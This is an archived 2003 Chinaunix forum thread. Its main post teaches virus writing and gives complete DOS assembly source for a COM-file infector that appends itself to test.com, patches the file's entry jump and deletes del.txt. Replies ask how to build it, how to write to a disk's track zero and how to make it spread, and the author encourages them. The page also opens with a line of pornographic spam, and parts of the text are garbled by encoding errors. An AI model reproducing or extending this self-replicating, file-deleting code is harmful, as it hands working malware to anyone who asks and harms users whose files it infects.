亚洲av成人无遮挡网站在线观看,少妇性bbb搡bbb爽爽爽,亚洲av日韩精品久久久久久,兔费看少妇性l交大片免费,无码少妇一区二区三区

Chinaunix

標題: [轉貼]病毒制作第一步~~~ [打印本頁]

作者: sai 時間: 2003-01-14 14:16
標題: [轉貼]病毒制作第一步~~~
病毒的編寫是一種高深技術，真正的病毒一般都具有：傳染性、隱藏性（又稱潛伏性）、破壞性�，F(xiàn)在的病毒種類也不少，如平常的傳染可執(zhí)行文件的病毒、宏病毒等等。但原始的、破壞性最大的病毒還是傳染可執(zhí)行文件的病毒（像CIH病毒），而這些病毒一般都是用匯編語言編寫的。有許多人對病毒有著好奇和向往，但是往往又因為匯編語言的難學等問題望而卻步。

這篇文章就是教給大家如何制作一個簡單的程序，這個程序雖然算不上病毒但是具有病毒的傳染性，而往往病毒的傳染性是平常人最難做到的。

好啦，現(xiàn)在轉入正題，先講講病毒是如何傳染的，傳染后又如何在被染的文件中執(zhí)行的，其實道理非常簡單：病毒一般將其代碼寫入執(zhí)行文件的尾部，然后使執(zhí)行文件在執(zhí)行時先執(zhí)行文件尾部的病毒代碼，然后再跳回原代碼處執(zhí)行。現(xiàn)在舉一個試例進行說明：

;-----------------------------------------
;功能：感染當前文件夾的test.com文件
; 并刪除當前文件夾的del.txt文件
; 顯示預設的字符串
CSEG SEGMENT
ASSUME CS:CSEG,DS:CSEG,SS:CSEG
main PROC NEAR
mainstart:
CALL vstart ;病毒的代碼開始處
vstart:
POP SI ;得到當前地址
MOV BP,SI ;保存當前地址
PUSH SI
MOV AH,9
ADD SI,OFFSET message-OFFSET vstart ;顯示預設字符串
MOV DX,SI
INT 21h
POP SI
ADD SI,OFFSET yuan4byte-OFFSET vstart ;取得原程序中的前四個字節(jié)
MOV DI,100h ;目的地址
MOV AX,DS:[SI] ;開始復制
MOV DS:[DI],AX
INC SI
INC SI
INC DI
INC DI
MOV AX,DS:[SI]
MOV DS:[DI],AX
MOV SI,BP ;恢復地址值
MOV DX,OFFSET delname-OFFSET vstart
ADD DX,SI
MOV AH,41h
INT 21h
MOV DX,OFFSET filename-OFFSET vstart ;得到文件名
ADD DX,SI
MOV AL,02
MOV AH,3dh ;寫文件
INT 21h
JC error
MOV BX,AX ;文件句柄
MOV DX,OFFSET yuan4byte-OFFSET vstart ;讀文件的前四個字節(jié)
ADD DX,SI
MOV CX,4
MOV AH,3fh
INT 21h
MOV AX,4202h ;到文件尾
XOR CX,CX
XOR DX,DX
INT 21h
MOV DI,OFFSET new4byte-OFFSET vstart ;保存要跳的地方
ADD DI,2
ADD DI,SI
SUB AX,4
MOV DS:[DI],AX
ADD SI,OFFSET mainstart-OFFSET vstart ;準備寫入病毒
MOV DX,SI
MOV vsizes,OFFSET vends-OFFSET mainstart
MOV CX,vsizes
MOV AH,40h
INT 21h
MOV SI,BP ;定位到文件頭
MOV AL,0
XOR CX,CX
XOR DX,DX
MOV AH,42h
INT 21h
MOV AH,40h ;將新的文件頭寫入
MOV CX,4
MOV DX,OFFSET new4byte-OFFSET vstart
ADD DX,SI
INT 21h
MOV AH,3eh ;關閉文件
INT 21h
error:
MOV AX,100h
PUSH AX
RET
main ENDP
yuan4byte:
RET
DB 3 DUP (?)
vsizes DW 0
new4byte DB ‘M‘,0e9h,0,0
filename DB "test.com",0
delname DB "del.txt",0
message DB "He he he he!"
DB 0dh,0ah,"$"
vends:
start:
MOV AX,CSEG
MOV DS,AX
MOV SS,AX
CALL main
MOV AX,4c00h
INT 21h
CSEG ENDS
END start
以上就是一個簡單的可以傳染COM文件的程序代碼, 也是想當初我所做的具有傳染性質(zhì)的第一個程序。如何？？？不難吧。
附：
COM文件執(zhí)行時將COM文件內(nèi)所的所有內(nèi)容COPY到內(nèi)存，起始地址是100，然后進行執(zhí)行
沒有任何有關節(jié)啦、段啦這些屬性，所以COM文件病毒是最簡單最簡單的病毒。

作者: dainh 時間: 2003-01-15 12:26
標題: [轉貼]病毒制作第一步~~~
收藏

作者: vangogh 時間: 2003-01-15 17:42
標題: [轉貼]病毒制作第一步~~~
呵呵，我想試一下，請問應該把這段代碼存成什么文件？

作者: 貓小 時間: 2003-01-15 18:43
標題: [轉貼]病毒制作第一步~~~
不是吧，公布匯編源代碼
真是開放啊，我先看看～
順便問下：大俠，如果寫硬盤零磁道，如何實現(xiàn)？

作者: 貓小 時間: 2003-01-15 18:46
標題: [轉貼]病毒制作第一步~~~
應該存成com就可以
存匯編不知道你什么系統(tǒng)？2000歇～

作者: sai 時間: 2003-01-16 08:48
標題: [轉貼]病毒制作第一步~~~
這是供大家學習交流用的，不要用來做壞事呀~~~

作者: activeport 時間: 2003-01-16 14:46
標題: [轉貼]病毒制作第一步~~~
new4byte DB ‘M‘,0e9h,0,0 ;單引號變成中文的了，改成英文的就好了

作者: boywhocools 時間: 2003-01-18 14:47
標題: [轉貼]病毒制作第一步~~~
高明，匯編倒是學過，不過學了重來沒用過�？磥硪院蟮煤煤醚芯垦芯苛恕�

作者: boywhocools 時間: 2003-01-18 14:50
標題: [轉貼]病毒制作第一步~~~
對了，請教，如何讓它自動執(zhí)行或者感染其他文件？是不是要用欺騙手段？

作者: sai 時間: 2003-01-20 10:25
標題: [轉貼]病毒制作第一步~~~
使用什么手段，就要看各位的功力了，我覺得主要是思路，只要找對思路就不難了。編程只是一種實現(xiàn)方式，關鍵是思路~~~

作者: 陽光妹妹 時間: 2003-01-27 19:15
提示: 作者被禁止或刪除內(nèi)容自動屏蔽

歡迎光臨 Chinaunix (http://www.72891.cn/)